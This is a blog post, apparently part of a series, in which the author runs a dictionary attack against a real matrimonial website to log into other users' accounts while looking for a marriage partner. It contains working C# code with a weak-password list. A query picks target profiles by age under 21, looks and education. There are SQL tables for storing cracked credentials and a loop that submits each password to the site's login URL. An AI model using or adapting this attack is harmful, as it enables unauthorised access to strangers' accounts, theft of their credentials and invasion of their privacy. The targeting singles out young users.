Search for life partner-A Software Architect experiences-Part-2

This is second post with reference to subject “Search for life partner-A Software Architect experiences”
In first part at Search for life partner-A Software Architect experiences-Part-1, we extracted profiles from http://www.shaadionline.tv by Geo and saved in local SQL Server Database, so that we can search each and every field of profile with all possible combinations.

So we solved the first problem. Second problem was that I wanted some userid/password to login to their profile. So in order to solve this problem, I decided to try dictionary attack on their web site with hit and try strategy.
So objective of this post is to extract the week passwords from http://www.shaadionline.tv by Geo.
Follow steps as:
1. So I identified possible passwords and declared in an array of string as:

string[] lstPossiblePasswords = { "1", "12", "123", "1234", "12345", "123456", "1234567", "12345678", "123456789", "1234567890", "21", "321", "4321", "54321", "654321", "7654321", "87654321", "987654321", "0987654321", "a", "ab", "abc", "abcd", "abcde", "abcdef","ba","cba","dcba" ,"edcba","fedcba","abc123","pass","password","pass1","pass12","pass123","pass21","pass321","shaadi","shaadioline"};

2. I decided to use the profile extracted in part 1 as starting point for dictionary attack.So I decided starting point criteria as:

    var q = from p in dbx.Profiles
                    where p.EducationDetails.ToLower().Contains("psych")
                    ||  p.EducationDetails.ToLower().Contains("bba")
                    ||  p.EducationDetails.ToLower().Contains("bcs")
                    ||  p.EducationDetails.ToLower().Contains("computer")
                    ||  p.Looks.ToLower().Contains("stun")
                    ||  p.Age < 21
                    orderby p.GID descending
                    select  p;
        

3. For this activity I created 2 new tables: Users table for saving verified/confirmed passwords.

CREATE TABLE [dbo].[Users](
	[Id] [int] IDENTITY(1,1) NOT NULL,
	[GID] [int] NULL,
	[ProfileId] [varchar](500) NULL,
	[Password] [varchar](500) NULL,
 CONSTRAINT [PK_Users] PRIMARY KEY CLUSTERED 
(
	[Id] ASC
)WITH (PAD_INDEX  = OFF, STATISTICS_NORECOMPUTE  = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS  = ON, ALLOW_PAGE_LOCKS  = ON) ON [PRIMARY]
) ON [PRIMARY]

GO

SET ANSI_PADDING OFF
GO

PasswordSearch Table for tracking profile ids on which dictionary attack has been tried.

CREATE TABLE [dbo].[PasswordSearch](
	[Id] [int] IDENTITY(1,1) NOT NULL,
	[GID] [int] NULL,
 CONSTRAINT [PK_PasswordSearch] PRIMARY KEY CLUSTERED 
(
	[Id] ASC
)WITH (PAD_INDEX  = OFF, STATISTICS_NORECOMPUTE  = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS  = ON, ALLOW_PAGE_LOCKS  = ON) ON [PRIMARY]
) ON [PRIMARY]

GO

4. Add all the 3 tables in linq 2 sql designer and build solution once and put following code in event handler of a button.

    DataClassesShaadiOnlineDataContext dbx = new DataClassesShaadiOnlineDataContext();
 
            var q = from p in dbx.Profiles
                    where p.EducationDetails.ToLower().Contains("psych")
                    ||  p.EducationDetails.ToLower().Contains("bba")
                    ||  p.EducationDetails.ToLower().Contains("bcs")
                    ||  p.EducationDetails.ToLower().Contains("computer")
                    ||  p.Looks.ToLower().Contains("stun")
                    ||  p.Age < 21
                    orderby p.GID descending
                    select  p;
            
            //q.OrderByDescending<Profile>("GID");
            foreach (var item in q)
            {
                foreach (var itemi in lstPossiblePasswords)
                {
                    string URL = "http://www.shaadionline.tv/chklogin.asp?camefrom=acc" + "&loginid="+item.ProfileID+"&pass1="+itemi;
                    string result = DownloadWebPage(URL);
                    if (!result.Contains("Please enter correct UserID and Password"))
                    {
                        User user = new User();
                        user.GID = item.GID;
                        user.ProfileId = item.ProfileID;
                        user.Password = itemi;
                        dbx.Users.InsertOnSubmit(user);
                        dbx.SubmitChanges();
                    }                    
                }
                PasswordSearch ps = new PasswordSearch();
                ps.GID = item.GID;
                dbx.PasswordSearches.InsertOnSubmit(ps);
                dbx.SubmitChanges();
            }
        

The above code loads profiles extracting in step 1 by applying some criteria ( those who are doing bbs,bcs,psych* and having stun* look and age is less then 21 years). Then each profile is tried against possible passwords by hitting on login url and if userid/password combination is verified /confirmed as correct, then it is saved in user database.
5. Following function is used for hitting for userid/password on web site.

  /// <summary>
        /// Returns the content of a given web adress as string.
        /// </summary>
        /// <param name="Url">URL of the webpage</param>
        /// <returns>Website content</returns>
        public string DownloadWebPage(string Url)
        {
            // Open a connection
            HttpWebRequest WebRequestObject = (HttpWebRequest)HttpWebRequest.Create(Url);
 
            // You can also specify additional header values like 
            // the user agent or the referer:
            WebRequestObject.UserAgent = ".NET Framework/2.0";
      
            WebRequestObject.Referer = "http://www.example.com/";
 
            // Request response:
            WebResponse Response = WebRequestObject.GetResponse();
 
            // Open data stream:
            Stream WebStream = Response.GetResponseStream();
 
            // Create reader object:
            StreamReader Reader = new StreamReader(WebStream);
 
            // Read the entire stream content:
            string PageContent = Reader.ReadToEnd();
 
            
            // Cleanup
            Reader.Close();
            WebStream.Close();
            Response.Close();
 
            return PageContent;
        }

So by this activity we can extract profiles with week passwords.

Best of luck for searching of life partner as Software professionals.

Note: It is not that i am exposing some secrete. Any programmer can do that easily. I warned to Shaadionline and Geo team about the week security in written back in 2005-2006. But they have not taken any action about its security up till now. That is very is appointing to me.

Advertisements

One Response to Search for life partner-A Software Architect experiences-Part-2

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: